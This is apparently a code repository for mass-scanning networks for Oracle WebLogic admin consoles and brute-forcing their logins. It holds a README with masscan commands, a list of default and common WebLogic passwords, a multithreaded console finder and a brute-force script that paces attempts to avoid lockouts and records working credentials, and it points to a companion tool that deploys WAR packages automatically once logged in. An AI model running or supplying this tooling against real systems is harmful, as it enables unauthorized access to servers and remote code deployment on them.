├── usr.txt
├── ip.txt
├── README.md
├── pwd.txt
├── spider.py
├── brute.py
└── LICENSE
/usr.txt:
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1 | weblogic
2 | system
3 |
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/ip.txt:
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1 | 10.0.0.0/8
2 | 172.16.0.0/12
3 |
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/README.md:
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1 | # Weblogic-Weakpassword-Scnner
2 | pip install requests
3 |
4 | You can use masscan to scan ip range with CIDR format
5 |
6 | masscan -iL ip.txt -oL 7001.txt -p 7001 --max-rate=80000
7 | awk '{print $4,$3}' 7001.txt|sed 's/ /:/g' >> scanned.txt
8 |
9 | For more information about masscan:https://github.com/robertdavidgraham/masscan
10 |
11 | About new version:Will use first 5 passwords to test all url in once, 30 min later,use next 5 passwords to do it again.More efficient than previous
12 |
13 | 1.python spider.py scanned.txt
14 |
15 | 2.python brute.py
16 |
17 | Also can use with https://github.com/dc3l1ne/Weblogic_Automatical_Attacker to deploy war package automatically
18 |
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/pwd.txt:
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1 | weblogic
2 | welcome1
3 | admin123
4 | 12345678
5 | password
6 | 123456789
7 | 11111111
8 | admin123!@#
9 | weblogicadmin
10 | weblogic123
11 | weblogic123456
12 | 88888888
13 | webadmin
14 | administrator
15 | 1qaz2wsx
16 | zxcvbnm,
17 | p@ssword
18 | passw0rd
19 | Passw0rd
20 | P@ssw0rd
21 | Weblogic
22 | Weblogic123
23 | Weblogic123456
24 | 987654321
25 | qwer1234
26 | Password123
27 | 1234!@#$
28 | !@#$%^&*
29 | 12345!@#$%
30 | zxcvbnm,./
31 | asdfghjkl;'
32 | qwertyuiop[]\
33 | asdfghjkl
34 | qwertyuiop
35 | 1234qwer
36 | !@#$qwer
37 | !@#$QWER
38 | abcd1234
39 | admin888
40 | 12344321
41 | @dmin123
42 | admin12345
43 | abc123!@#
44 | qweasdzxc
45 | qazwsx123
46 | P@ssw0rd123
47 | 1q2w3e4r5t
48 | P@$$word
49 | P@$$w0rd
50 | weblogicpassword
51 | !@#$%^&*()
52 | 1234!@#$%
53 | asd123!@#
54 | asd456!@#
55 | asd789!@#
56 | admin666
57 | admin111
58 | admin222
59 | weblogic888
60 | admin666888
61 |
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/spider.py:
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1 | #coding=utf-8
2 | import requests
3 | import threading
4 | import time
5 | import os
6 | import sys
7 | import traceback
8 | from Queue import Queue
9 |
10 | MAX_THREAD=200
11 |
12 | class Spider:
13 | def __init__(self):
14 | self.success=0
15 | self.url_queue=Queue(maxsize=2000)
16 | def _check(self):
17 | while True:
18 | try:
19 | if self.url_queue.qsize() !=0:
20 | url=self.url_queue.get()
21 | self.total-=1
22 | r = requests.get('http://%s/console/login/LoginForm.jsp' % (url), timeout=10)
23 | status = r.content.count('WebLogic')
24 | if status != 0:
25 | r = 0
26 | # print url, 'Exists!!!!! '
27 | self.success += 1
28 | f = open("url_list", 'a')
29 | f.write(url + '\n')
30 | f.close()
31 | else:
32 | print 'exit'
33 | break
34 | except:
35 | pass
36 | def read_url_list(self):
37 | with open(sys.argv[1]) as f:
38 | for url in f:
39 | url = url.strip()
40 | self.url_queue.put(url)
41 | def blocks(self,files, size=65536):
42 | while True:
43 | b = files.read(size)
44 | if not b: break
45 | yield b
46 | def _main(self):
47 | with open(sys.argv[1]) as f:
48 | self.total=sum(bl.count("\n") for bl in self.blocks(f))
49 | print self.total
50 | t = threading.Thread(target=self.read_url_list)
51 | t.daemon = True
52 | t.start()
53 | time.sleep(5)
54 | for i in range(0,MAX_THREAD):
55 | t = threading.Thread(target=self._check)
56 | t.daemon = True
57 | t.start()
58 | while self.url_queue.qsize() !=0:
59 | sys.stdout.write("Current threads: %d,URLs left: %d,Success:%d \r" % (
60 | threading.active_count(), self.total, self.success), )
61 | sys.stdout.flush()
62 | time.sleep(0.3)
63 | while threading.active_count() > 1:
64 | sys.stdout.write("Current threads: %d,URLs left: %d,Success:%d \r" % (
65 | threading.active_count(), self.total, self.success), )
66 | sys.stdout.flush()
67 | time.sleep(1)
68 | if __name__ == '__main__':
69 | run=Spider()
70 | run._main()
71 |
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/brute.py:
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1 | import requests
2 | import time
3 | import threading
4 | import traceback
5 | import sys
6 |
7 | RETRY=3
8 | MAX_THREAD=50
9 |
10 | class Brute:
11 | def __init__(self):
12 | self.success=0
13 | self.fail=0
14 | self.error=0
15 | self.sec=0
16 | self.success_list=[]
17 | self.error_list=[]
18 | self.doing_list=[]
19 | def _do_login(self,url,usr,pwd):
20 | data = {'j_username': usr, 'j_password': pwd}
21 | count=0
22 | while url in self.doing_list: #To increase accuracy,add a doing lock
23 | time.sleep(1) #If other thread is trying,we wait for it
24 | if url not in self.success_list:
25 | self.doing_list.append(url) #It's time for us to do it while no other thread is doing the same thing.
26 | else:
27 | return #If other thread get it before this thread,we exit.
28 | while count < RETRY:
29 | try:
30 | s = requests.post('http://%s/console/j_security_check'%url, data=data, timeout=10)
31 | if s.content.count('Home Page') != 0 or s.content.count('WebLogic Server Console') != 0 or s.content.count('console.portal') != 0:
32 | sys.stdout.write('Success!!!!! %s %s/%s \n' % (url, usr, pwd))
33 | sys.stdout.flush()
34 | self.success += 1
35 | self.success_list.append(url)
36 | f = open('success.txt', 'a')
37 | f.write('%s %s/%s\n' % (url, usr, pwd))
38 | f.close()
39 | del self.doing_list[self.doing_list.index(url)]
40 | return True
41 | else:
42 | del self.doing_list[self.doing_list.index(url)]
43 | self.fail+=1
44 | return False
45 | except:
46 | # traceback.print_exc()
47 | count+=1
48 | time.sleep(1)
49 | del self.doing_list[self.doing_list.index(url)] #Error
50 | self.error+=1
51 | self.error_list.append(url)
52 | f=open('error.txt','a')
53 | f.write('%s\n'%url)
54 | f.close()
55 |
56 | def _main(self):
57 | for usr in open('usr.txt').readlines():
58 | count=0
59 | usr=usr.strip()
60 | for pwd in open('pwd.txt').readlines():
61 | pos=0
62 | self.fail = 0
63 | count+=1
64 | pwd=pwd.strip()
65 | if count == 6:
66 | self.sec=310
67 | while self.sec != 0:
68 | time.sleep(1)
69 | sys.stdout.write('Waiting,%d \r'%self.sec)
70 | sys.stdout.flush()
71 | self.sec-=1
72 | count=1
73 | with open(sys.argv[1]) as f:
74 | for url in f:
75 | pos+=1
76 | url = url.strip()
77 | if url not in self.success_list:
78 | if url not in self.error_list:
79 | t = threading.Thread(target=self._do_login, args=(url,usr,pwd))
80 | t.daemon=True
81 | while True:
82 | if threading.active_count() < MAX_THREAD:
83 | t.start()
84 | sys.stdout.write( "Current threads: %d,Position:%d,Success:%d,Fail:%d,Error:%d\r" % (threading.active_count(),pos,self.success,self.fail,self.error),)
85 | sys.stdout.flush()
86 | time.sleep(0.001)
87 | break
88 | else:
89 | time.sleep(1)
90 | #do nothing with success or error ip
91 | if __name__ == '__main__':
92 | run=Brute()
93 | try:
94 | run._main()
95 | except KeyboardInterrupt:
96 | exit()
97 |
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